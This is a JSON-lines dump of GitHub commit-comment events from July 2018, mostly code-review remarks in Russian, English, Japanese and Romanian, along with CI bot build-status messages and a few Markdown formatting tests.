{"id":"7991685628","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29770784,"position":38,"line":53,"path":"Lesson_3/station_control.rb","commit_id":"1113d7759de7f771a640810e806542b94d45d14d","created_at":"2018-07-19T21:19:05Z","updated_at":"2018-07-19T21:19:05Z","author_association":"NONE","body":"Тут осталася ридер speed, что верно, но я на всякий случай хочу убедиться, что ты знаешь, что делает attr_accessor. Он определеяет и ридер и райтер для инстанс переменной. То есть \r\n```\r\n# это\r\nattr_accessor :speed\r\n# разворачивается в\r\ndef speed\r\n  @speed\r\nend\r\n\r\ndef speed=(new_value)\r\n  @speed = new_value\r\nend\r\n```\r\nНо speed тут нам нужен только для чтения извне"}},"created_at":"2018-07-19T21:19:05Z"}
{"id":"7991685836","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29770785,"position":null,"line":null,"path":null,"commit_id":"0a03becc60423c02a7e155807379fa0109778b95","created_at":"2018-07-19T21:19:07Z","updated_at":"2018-07-19T21:19:07Z","author_association":"NONE","body":"Congrats! "}},"created_at":"2018-07-19T21:19:07Z"}
{"id":"7991686068","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29770786,"position":69,"line":69,"path":"StudentIQTest-shell/pom.xml","commit_id":"3190fddc38e9a457f3a2c6254fbe222114b7eca7","created_at":"2018-07-19T21:19:10Z","updated_at":"2018-07-19T21:19:10Z","author_association":"NONE","body":"А жта зависимость есть `spring-boot-starter-test`"}},"created_at":"2018-07-19T21:19:10Z"}
{"id":"7991686487","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29770787,"position":103,"line":73,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"3a135f21c95bf2e361a9fb25f117dbe81d724875","created_at":"2018-07-19T21:19:16Z","updated_at":"2018-07-19T21:19:16Z","author_association":"COLLABORATOR","body":"or did you want me to return the string to be included in the schema.fasta output?"}},"created_at":"2018-07-19T21:19:16Z"}
{"id":"7991689367","type":"CommitCommentEvent","actor":{"login":"Scode97"},"repo":{"name":"Scode97/challenge1"},"payload":{"comment":{"id":29770798,"position":null,"line":null,"path":null,"commit_id":"c3a73296daa48628d3651cd96e8505c5d94a92d0","created_at":"2018-07-19T21:19:55Z","updated_at":"2018-07-19T21:19:55Z","author_association":"OWNER","body":"this"}},"created_at":"2018-07-19T21:19:55Z"}
{"id":"7991689415","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29770800,"position":103,"line":73,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"3a135f21c95bf2e361a9fb25f117dbe81d724875","created_at":"2018-07-19T21:19:56Z","updated_at":"2018-07-19T21:19:56Z","author_association":"COLLABORATOR","body":"such as instead of {{chromsome}}{position}-{group}, I just have the string?"}},"created_at":"2018-07-19T21:19:56Z"}
{"id":"7991690921","type":"CommitCommentEvent","actor":{"login":"Scode97"},"repo":{"name":"Scode97/challenge1"},"payload":{"comment":{"id":29770805,"position":null,"line":null,"path":null,"commit_id":"c3a73296daa48628d3651cd96e8505c5d94a92d0","created_at":"2018-07-19T21:20:15Z","updated_at":"2018-07-19T21:20:15Z","author_association":"OWNER","body":"this"}},"created_at":"2018-07-19T21:20:15Z"}
{"id":"7991691730","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29770807,"position":60,"line":75,"path":"Lesson_3/station_control.rb","commit_id":"1113d7759de7f771a640810e806542b94d45d14d","created_at":"2018-07-19T21:20:26Z","updated_at":"2018-07-19T21:20:26Z","author_association":"NONE","body":"И нужен метод для замедления. Честно говоря, меня этот метод интересует только ради условия, где скорость будет становиться ниже 0"}},"created_at":"2018-07-19T21:20:26Z"}
{"id":"7991696228","type":"CommitCommentEvent","actor":{"login":"mohana1988"},"repo":{"name":"etiennerached/website-twitter-followers-script"},"payload":{"comment":{"id":29770817,"position":null,"line":null,"path":null,"commit_id":"25248fa7f59c69f676f0609f98532a12ef7a6cd5","created_at":"2018-07-19T21:21:28Z","updated_at":"2018-07-19T21:21:28Z","author_association":"NONE","body":"Hello Sir\r\nI am trying to find the paid version of this script!! or the seller! \r\n\r\ncan you help me find the paid version of this script? \r\n\r\nI would be glad. If you help me.\r\n\r\nMohana\r\nEmail: mohanaalserwer@gmail.com\r\n"}},"created_at":"2018-07-19T21:21:28Z"}
{"id":"7991696655","type":"CommitCommentEvent","actor":{"login":"kwsch"},"repo":{"name":"Atmosphere-NX/Atmosphere"},"payload":{"comment":{"id":29770819,"position":13,"line":126,"path":"fusee/fusee-primary/src/main.c","commit_id":"3db9ce32faa07466fd40ab003e04a6b9553f96bf","created_at":"2018-07-19T21:21:33Z","updated_at":"2018-07-19T21:21:33Z","author_association":"CONTRIBUTOR","body":"Does removal of this close #153 ?"}},"created_at":"2018-07-19T21:21:33Z"}
{"id":"7991698454","type":"CommitCommentEvent","actor":{"login":"aakp10"},"repo":{"name":"aakp10/src"},"payload":{"comment":{"id":29770826,"position":162,"line":228,"path":"sys/dev/i2c/tea5767.c","commit_id":"5e90b57d3bfccd4e7cac556d4627e844c52a8185","created_at":"2018-07-19T21:21:58Z","updated_at":"2018-07-19T21:21:58Z","author_association":"OWNER","body":"```static int\r\ntea5767_search(void *v, int dir)\r\n{\r\n    struct tea5767_softc *sc = v;\r\n    uint8_t reg[5];\r\n\r\n    /* increment frequency to search for the next frequency*/\r\n    //sc->tune.freq = sc->tune.freq >= 107500 ? 87500 : sc->tune.freq + 100;\r\n    tea5767_set_properties(sc, reg);\r\n    /*\r\n     * search activated\r\n     * if dir 1 => search up\r\n     * else : search down\r\n     */\r\n\r\n    reg[0] |= TEA5767_SEARCH;\r\n\r\n    if (dir)\r\n        reg[2] |= TEA5767_SUD;\r\n    reg[2] |= sc->tune.adc_stop_level; /* Stop level for search*/\r\n    tea5767_write(sc, reg);\r\n    memset(reg, 0, 5);\r\n    while (tea5767_read(sc, reg), !(reg[0] & TEA5767_READY_FLAG)) {\r\n        kpause(\"teasrch\", true, hz, NULL);\r\n    }\r\n    return 0;\r\n}\r\n```"}},"created_at":"2018-07-19T21:21:58Z"}
{"id":"7991699214","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29770830,"position":82,"line":92,"path":"Lesson_3/station_control.rb","commit_id":"1113d7759de7f771a640810e806542b94d45d14d","created_at":"2018-07-19T21:22:09Z","updated_at":"2018-07-19T21:22:09Z","author_association":"NONE","body":"Ты написал в route метод first_station. Используй его тут. Чем меньше поезд знает о реализации других классов - тем лучше."}},"created_at":"2018-07-19T21:22:09Z"}
{"id":"7991700479","type":"CommitCommentEvent","actor":{"login":"ted-morrison"},"repo":{"name":"ted-morrison/TestingNewRepository"},"payload":{"comment":{"id":29770834,"position":1,"line":1,"path":"README.md","commit_id":"853cb13d9496917ecae9e2a0313f1feca9c30641","created_at":"2018-07-19T21:22:26Z","updated_at":"2018-07-19T21:22:26Z","author_association":"OWNER","body":"# Additional comments testing here"}},"created_at":"2018-07-19T21:22:26Z"}
{"id":"7991700691","type":"CommitCommentEvent","actor":{"login":"krishnallasivam"},"repo":{"name":"krishnallasivam/KrishFirstSample"},"payload":{"comment":{"id":29770836,"position":null,"line":null,"path":null,"commit_id":"73a6eebe62f364202014549af1ecfcf454802f7b","created_at":"2018-07-19T21:22:29Z","updated_at":"2018-07-19T21:22:29Z","author_association":"OWNER","body":"First on original repositiory in master"}},"created_at":"2018-07-19T21:22:29Z"}
{"id":"7991700743","type":"CommitCommentEvent","actor":{"login":"ted-morrison"},"repo":{"name":"ted-morrison/TestingNewRepository"},"payload":{"comment":{"id":29770837,"position":null,"line":null,"path":null,"commit_id":"853cb13d9496917ecae9e2a0313f1feca9c30641","created_at":"2018-07-19T21:22:30Z","updated_at":"2018-07-19T21:22:30Z","author_association":"OWNER","body":"# Testing a single hash tag\r\n## Testing a double hash tag\r\n###Testing a triple has tag\r\n**Bold text**\r\n_Italics text_\r\n\r\n- [ ] Task 1\r\n- [ ] Task 20\r\n- [ ] Task 30"}},"created_at":"2018-07-19T21:22:30Z"}
{"id":"7991703335","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29770844,"position":87,"line":97,"path":"Lesson_3/station_control.rb","commit_id":"1113d7759de7f771a640810e806542b94d45d14d","created_at":"2018-07-19T21:23:04Z","updated_at":"2018-07-19T21:23:04Z","author_association":"NONE","body":"Оставил коммент в прошлом ПР. Там не сработало потому-что мы забыли перевернуть условия.\r\nif next_station\r\n  # do it"}},"created_at":"2018-07-19T21:23:04Z"}
{"id":"7991705469","type":"CommitCommentEvent","actor":{"login":"generalisofficial"},"repo":{"name":"swf541/Cold-War--The-Iron-Curtain"},"payload":{"comment":{"id":29770851,"position":null,"line":null,"path":null,"commit_id":"381feb34f09ffed3665d013b2a05ea4e046ef6f5","created_at":"2018-07-19T21:23:33Z","updated_at":"2018-07-19T21:23:33Z","author_association":"COLLABORATOR","body":"BUT MUH PERMISSION CRY CRY CRY"}},"created_at":"2018-07-19T21:23:33Z"}
{"id":"7991708114","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29770858,"position":90,"line":98,"path":"Lesson_3/station_control.rb","commit_id":"1113d7759de7f771a640810e806542b94d45d14d","created_at":"2018-07-19T21:24:10Z","updated_at":"2018-07-19T21:24:10Z","author_association":"NONE","body":"Тут нужно использовать метод current_station. Иначе зачем мы его писали?"}},"created_at":"2018-07-19T21:24:10Z"}
{"id":"7991733280","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29770930,"position":50,"line":78,"path":"test/tests.js","commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-19T21:30:05Z","updated_at":"2018-07-19T21:30:05Z","author_association":"NONE","body":"Assert returns a promise? This is why you have that error. "}},"created_at":"2018-07-19T21:30:05Z"}
{"id":"7991733742","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29770931,"position":132,"line":481,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"9d5e25baa1f121bdb9bff0f7bc2001008e3b5ef3","created_at":"2018-07-19T21:30:12Z","updated_at":"2018-07-19T21:30:12Z","author_association":"OWNER","body":"OK, will do after merging in the initial CorInfoImpl refactoring."}},"created_at":"2018-07-19T21:30:12Z"}
{"id":"7991739334","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29770953,"position":103,"line":73,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"3a135f21c95bf2e361a9fb25f117dbe81d724875","created_at":"2018-07-19T21:31:25Z","updated_at":"2018-07-19T21:31:25Z","author_association":"COLLABORATOR","body":"It may be preferable to return the string as a string through an API call such as if a web app is made for biohansel scheme creation or to simply print to stdout rather than specifically writing to a file. "}},"created_at":"2018-07-19T21:31:25Z"}
{"id":"7991739816","type":"CommitCommentEvent","actor":{"login":"krishnallasivam"},"repo":{"name":"krishnallasivam/KrishFirstSample"},"payload":{"comment":{"id":29770955,"position":null,"line":null,"path":null,"commit_id":"73a6eebe62f364202014549af1ecfcf454802f7b","created_at":"2018-07-19T21:31:31Z","updated_at":"2018-07-19T21:31:31Z","author_association":"OWNER","body":"new copy in github. Comitting now"}},"created_at":"2018-07-19T21:31:31Z"}
{"id":"7991741535","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29770957,"position":103,"line":230,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"9d5e25baa1f121bdb9bff0f7bc2001008e3b5ef3","created_at":"2018-07-19T21:31:57Z","updated_at":"2018-07-19T21:31:57Z","author_association":"OWNER","body":"Got it, will rename after merging in the prerequisite changes."}},"created_at":"2018-07-19T21:31:57Z"}
{"id":"7991742104","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"tBlabs/CV"},"payload":{"comment":{"id":29770958,"position":24,"line":48,"path":"README.md","commit_id":"90c0ff35fe575cae0704b8dee027250969bc75c5","created_at":"2018-07-19T21:32:07Z","updated_at":"2018-07-19T21:32:07Z","author_association":"NONE","body":"*`TypeScript`"}},"created_at":"2018-07-19T21:32:07Z"}
{"id":"7991743355","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29770959,"position":null,"line":null,"path":null,"commit_id":"6126f4f1155057f3de39643c35d7056aca032917","created_at":"2018-07-19T21:32:24Z","updated_at":"2018-07-19T21:32:24Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/6126f4f1155057f3de39643c35d7056aca032917/index.html"}},"created_at":"2018-07-19T21:32:24Z"}
{"id":"7991746718","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29770961,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-19T21:33:13Z","updated_at":"2018-07-19T21:33:13Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-19T21:33:13Z"}
{"id":"7991750097","type":"CommitCommentEvent","actor":{"login":"fujikaiser"},"repo":{"name":"fujikaiser/fujikaiser.github.io"},"payload":{"comment":{"id":29770966,"position":null,"line":null,"path":null,"commit_id":"7ea2a36a281413b45af13b5ee5d6f7a14f46c732","created_at":"2018-07-19T21:34:02Z","updated_at":"2018-07-19T21:34:02Z","author_association":"OWNER","body":"Updated index.html"}},"created_at":"2018-07-19T21:34:02Z"}
{"id":"7991750842","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29770968,"position":null,"line":null,"path":null,"commit_id":"e6c53a9981ad1c8e0c791ca38f6ac0f00df28b29","created_at":"2018-07-19T21:34:14Z","updated_at":"2018-07-19T21:34:14Z","author_association":"COLLABORATOR","body":"<h3>Publish</h3>\n\nPreview: <strong><a href='https://18691-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18691-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18691-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-19T21:34:14Z"}
{"id":"7991752666","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29770973,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-19T21:34:41Z","updated_at":"2018-07-19T21:34:41Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T21:34:41Z"}
{"id":"7991755830","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29770985,"position":103,"line":230,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"9d5e25baa1f121bdb9bff0f7bc2001008e3b5ef3","created_at":"2018-07-19T21:35:27Z","updated_at":"2018-07-19T21:35:27Z","author_association":"OWNER","body":"I think one other point of note here is that many of the NodeFactory methods are actually not applicable for ReadyToRunCodegenNodeFactory and we're silently creating tons of caches within the base NodeFactory where we just keep our fingers crossed that these will never be used in R2R because we're circumventing the actual implementations by directly calling into ReadyToRunCodegenNodeFactory from CorInfoImpl.ReadyToRun. Perhaps one other interesting avenue for cleanup might be to figure out how to make NodeFactory the true base and chase out the RyuJit-specific parts to a derived class."}},"created_at":"2018-07-19T21:35:27Z"}
{"id":"7991756133","type":"CommitCommentEvent","actor":{"login":"tramyardg"},"repo":{"name":"tramyardg/angularjs-tut"},"payload":{"comment":{"id":29770986,"position":null,"line":null,"path":null,"commit_id":"50d330c03fbfa36febe65fdae57d135e2f6c0029","created_at":"2018-07-19T21:35:32Z","updated_at":"2018-07-19T21:35:32Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/5623994/42971401-20f5c016-8b7a-11e8-826b-ba4245b73b82.png)\r\n"}},"created_at":"2018-07-19T21:35:32Z"}
{"id":"7991761019","type":"CommitCommentEvent","actor":{"login":"williansabiao"},"repo":{"name":"udacity/reactnd-UdaciFitness-complete"},"payload":{"comment":{"id":29770991,"position":null,"line":null,"path":null,"commit_id":"1cc6fd9ce59e9acf6012aa5800b872ac98b5e209","created_at":"2018-07-19T21:36:45Z","updated_at":"2018-07-19T21:36:45Z","author_association":"NONE","body":"@hgareeballa it's an issue with expo: https://github.com/expo/expo/issues/1620\r\n\r\nI have the same problem here. "}},"created_at":"2018-07-19T21:36:45Z"}
{"id":"7991768349","type":"CommitCommentEvent","actor":{"login":"Yasunari15"},"repo":{"name":"UT-TeX/ut-tex.github.io"},"payload":{"comment":{"id":29771006,"position":null,"line":null,"path":null,"commit_id":"b29df07dcc9e54a1a97083269ed7dcef06a4b325","created_at":"2018-07-19T21:38:33Z","updated_at":"2018-07-19T21:38:33Z","author_association":"MEMBER","body":"@doraTeX Profileをご自身のTwitterに合わせて更新致しました。ご確認ください。"}},"created_at":"2018-07-19T21:38:33Z"}
{"id":"7991775836","type":"CommitCommentEvent","actor":{"login":"MuellerMH"},"repo":{"name":"MuellerMH/tk8"},"payload":{"comment":{"id":29771020,"position":20,"line":20,"path":"cmd/command/aws.go","commit_id":"e6e149927b4e907d17c1c637580bfe6659bbc46c","created_at":"2018-07-19T21:40:22Z","updated_at":"2018-07-19T21:40:22Z","author_association":"OWNER","body":"In my opinion, this part is so dependent on the whole package that it cannot be used in other programs, because you can't just include the cluster package without having all the dependencies needed to execute the commands.  I therefore think that the restrictions should be set on reusability."}},"created_at":"2018-07-19T21:40:22Z"}
{"id":"7991780051","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"deft1991/otus"},"payload":{"comment":{"id":29771024,"position":1,"line":1,"path":".idea/compiler.xml","commit_id":"087e449b2c26afd8fc15cbdf27ec56fc2a5b852c","created_at":"2018-07-19T21:41:20Z","updated_at":"2018-07-19T21:41:20Z","author_association":"NONE","body":"В .gitgnore.\r\n\r\nВо всех видюшках и туториалх в initial commit коммиттся сначала .gitignore))"}},"created_at":"2018-07-19T21:41:20Z"}
{"id":"7991782162","type":"CommitCommentEvent","actor":{"login":"arush-sal"},"repo":{"name":"MuellerMH/tk8"},"payload":{"comment":{"id":29771033,"position":20,"line":20,"path":"cmd/command/aws.go","commit_id":"e6e149927b4e907d17c1c637580bfe6659bbc46c","created_at":"2018-07-19T21:41:50Z","updated_at":"2018-07-19T21:41:50Z","author_association":"NONE","body":"Yeah it makes sense <3"}},"created_at":"2018-07-19T21:41:50Z"}
{"id":"7991783042","type":"CommitCommentEvent","actor":{"login":"krishnallasivam"},"repo":{"name":"krishnallasivam/KrishFirstSample"},"payload":{"comment":{"id":29771038,"position":null,"line":null,"path":null,"commit_id":"0c07079f00c1ff87b34ea09a2d73966bc3cfae88","created_at":"2018-07-19T21:42:04Z","updated_at":"2018-07-19T21:42:04Z","author_association":"OWNER","body":"Adding comments now as 3rd time"}},"created_at":"2018-07-19T21:42:04Z"}
{"id":"7991790175","type":"CommitCommentEvent","actor":{"login":"arush-sal"},"repo":{"name":"MuellerMH/tk8"},"payload":{"comment":{"id":29771062,"position":null,"line":null,"path":null,"commit_id":"e6e149927b4e907d17c1c637580bfe6659bbc46c","created_at":"2018-07-19T21:43:51Z","updated_at":"2018-07-19T21:43:51Z","author_association":"NONE","body":"This is great. Few suggestions:\r\n\r\n* Let's keep one change per commit which will make it easier to review.\r\n* I loved the overall restructuring of the files making the project root cleaner.\r\n* One request for a suggestion: Currently the due to the package dependency of `kubernauts/tk8/cmd` we need to change the `vendor/github.com/kubernauts/tk8/cmd` simultaneously with all the changes that we do in our `kubernauts/tk8/cmd` which is quite troublesome. So, how can we fix this?\r\n\r\nLet's discuss it further in the slack channel, WYT?"}},"created_at":"2018-07-19T21:43:51Z"}
{"id":"7991795083","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"deft1991/otus"},"payload":{"comment":{"id":29771073,"position":15,"line":35,"path":"homework6/src/main/java/ru/deft/homework6/repository/BookDaoJdbc.java","commit_id":"13fe34230d0df1c95694069ac245ea64959b6ab3","created_at":"2018-07-19T21:45:04Z","updated_at":"2018-07-19T21:45:04Z","author_association":"NONE","body":"Используйте NamedParameterJdbcTemplate всегда. Не унжно этих вопросиков даже в простых запросах.\r\n\r\nДа, и rowmapper лучше в поле помещать - сэкономите создание объектов."}},"created_at":"2018-07-19T21:45:04Z"}
{"id":"7991803297","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"deft1991/otus"},"payload":{"comment":{"id":29771086,"position":16,"line":36,"path":"homework6/src/main/java/ru/deft/homework6/repository/BookDaoJdbc.java","commit_id":"13fe34230d0df1c95694069ac245ea64959b6ab3","created_at":"2018-07-19T21:47:07Z","updated_at":"2018-07-19T21:47:07Z","author_association":"NONE","body":"А вот это непонятнозачем здесь.\r\n\r\nДа и переписать этот анонимный класс можно с помощью лямбды."}},"created_at":"2018-07-19T21:47:07Z"}
{"id":"7991808333","type":"CommitCommentEvent","actor":{"login":"AlinGabriel"},"repo":{"name":"ami-lab/CONSERT-IDE"},"payload":{"comment":{"id":29771093,"position":36,"line":75,"path":"CONSERT-IDE/src/org/aimas/consert/ide/model/ContextEntityModel.java","commit_id":"762077b1637a4750621f1f57e9b19f8a4a4a285a","created_at":"2018-07-19T21:48:17Z","updated_at":"2018-07-19T21:48:17Z","author_association":"COLLABORATOR","body":"Aceasta clasa trebuie sa ramana doar un POJO. Metoda aceasta trebuie mutata in ProjectModel."}},"created_at":"2018-07-19T21:48:17Z"}
{"id":"7991811753","type":"CommitCommentEvent","actor":{"login":"jlian"},"repo":{"name":"jlian/smart-door-buzzer-twilio-functions"},"payload":{"comment":{"id":29771099,"position":null,"line":null,"path":null,"commit_id":"f5eef50a4e2b19d2ac7867d8eba4f94b71774222","created_at":"2018-07-19T21:49:10Z","updated_at":"2018-07-19T21:49:10Z","author_association":"OWNER","body":"Twilio started to include punctuation in speech results, and my code wasn't ready to handle it, so I couldn't use the password to get into my building"}},"created_at":"2018-07-19T21:49:10Z"}
{"id":"7991813370","type":"CommitCommentEvent","actor":{"login":"stigok"},"repo":{"name":"mongodb/node-mongodb-native"},"payload":{"comment":{"id":29771103,"position":null,"line":null,"path":null,"commit_id":"e55e7ce2194eae57359f883a8f59f5d34e95f58d","created_at":"2018-07-19T21:49:32Z","updated_at":"2018-07-19T21:49:32Z","author_association":"CONTRIBUTOR","body":"nice solution"}},"created_at":"2018-07-19T21:49:32Z"}
{"id":"7991819907","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"deft1991/otus"},"payload":{"comment":{"id":29771118,"position":2,"line":46,"path":"homework6/src/main/java/ru/deft/homework6/Homework6Application.java","commit_id":"0c0e1b0377b337f7e70c5953d1e38ee6e8925421","created_at":"2018-07-19T21:51:10Z","updated_at":"2018-07-19T21:51:10Z","author_association":"NONE","body":"Предполагалось, что Вы сделаете spring-shell интерфейс)"}},"created_at":"2018-07-19T21:51:10Z"}
{"id":"7991821610","type":"CommitCommentEvent","actor":{"login":"kbeame"},"repo":{"name":"jimvermillion/zoomable-treemap-prototype"},"payload":{"comment":{"id":29771120,"position":9,"line":284,"path":"src/components/TreemapCell.tsx","commit_id":"9ca0c4188e01257321f6ff4f369f3e85093dc364","created_at":"2018-07-19T21:51:34Z","updated_at":"2018-07-19T21:51:34Z","author_association":"COLLABORATOR","body":"Don't we just love IE..."}},"created_at":"2018-07-19T21:51:34Z"}
{"id":"7991822337","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29771123,"position":null,"line":null,"path":null,"commit_id":"b404f4aaf2bd268e775fc3e2ef2ef67fcc193c48","created_at":"2018-07-19T21:51:45Z","updated_at":"2018-07-19T21:51:45Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-29](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-29).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-29-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-19T21:51:45Z"}
{"id":"7991826490","type":"CommitCommentEvent","actor":{"login":"hunterowens"},"repo":{"name":"CityOfLosAngeles/mobility-data-specification"},"payload":{"comment":{"id":29771134,"position":null,"line":null,"path":null,"commit_id":"b7013c5f923a894e99d1087a18353aab982b9207","created_at":"2018-07-19T21:52:50Z","updated_at":"2018-07-19T21:52:50Z","author_association":"MEMBER","body":"Any reasons for the <a> tags? "}},"created_at":"2018-07-19T21:52:50Z"}
{"id":"7991830991","type":"CommitCommentEvent","actor":{"login":"jrgm"},"repo":{"name":"mozilla/fxa-email-service"},"payload":{"comment":{"id":29771146,"position":33,"line":326,"path":"src/settings/mod.rs","commit_id":"b69cfb5365629bbd2923e2b6a99f07186ad071ce","created_at":"2018-07-19T21:53:57Z","updated_at":"2018-07-19T21:53:57Z","author_association":"MEMBER","body":"NODE_ENV?"}},"created_at":"2018-07-19T21:53:57Z"}
{"id":"7991832422","type":"CommitCommentEvent","actor":{"login":"Mykhailo2512"},"repo":{"name":"Mykhailo2512/GaleraTEST"},"payload":{"comment":{"id":29771151,"position":null,"line":null,"path":null,"commit_id":"f00b96e527f50d451564ed74e3bc4fc0a888e73a","created_at":"2018-07-19T21:54:18Z","updated_at":"2018-07-19T21:54:18Z","author_association":"OWNER","body":"# роир\n## оо**ро_о_ ** "}},"created_at":"2018-07-19T21:54:18Z"}
{"id":"7991834981","type":"CommitCommentEvent","actor":{"login":"shioyadan"},"repo":{"name":"onikiri/onikiri2"},"payload":{"comment":{"id":29771160,"position":null,"line":null,"path":null,"commit_id":"aa7cfd51d7b3bee0f01326a0919b190969c1ab9c","created_at":"2018-07-19T21:54:53Z","updated_at":"2018-07-19T21:54:53Z","author_association":"COLLABORATOR","body":"・ここも，たぶん，取り出そうとするビット長が変数より長い場合の対応を追加したのだと思うんだけど，何が行われてるのかとか，そういうことをコメントに書いて欲しい．"}},"created_at":"2018-07-19T21:54:53Z"}
{"id":"7991836005","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29771164,"position":null,"line":null,"path":null,"commit_id":"8503ace5f2af9cffe38718d7d1e0f51d84e584d0","created_at":"2018-07-19T21:55:10Z","updated_at":"2018-07-19T21:55:10Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3718redis](https://3718redis-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/redis](https://3718redis-static-docs.pantheonsite.io/docs/redis)\n- [/docs/style-guide](https://3718redis-static-docs.pantheonsite.io/docs/style-guide)\n"}},"created_at":"2018-07-19T21:55:10Z"}
